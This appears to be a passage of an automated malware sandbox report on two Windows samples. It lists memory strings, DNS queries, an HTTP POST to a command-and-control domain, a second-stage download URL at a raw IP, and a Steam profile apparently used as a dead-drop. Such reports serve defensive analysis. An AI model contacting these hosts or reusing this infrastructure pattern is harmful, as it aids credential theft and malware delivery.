charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 17 Dec 2024 07:18:56 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz

Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: DG55Gu1yGM.exe, DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe$
Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe0
Source: DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeR8
Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeZ0
Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exea
Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exed
Source: DG55Gu1yGM.exe, 00000000.00000003.2164609961.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exex
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/api
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://debonairnukk.xyz/apix
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://diffuculttan.xyz/api5
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api
Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/apiR
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/M
Source: DG55Gu1yGM.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: DG55Gu1yGM.exe, 00000000.00000002.4556945337.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEk
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000094F000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000094F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api9
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.0000000000928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/9
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900Y
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.00000000009B9000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/H
Source: 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/api0
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003037000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287007310.0000000003031000.00000004.00000800.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Source: unknown	HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
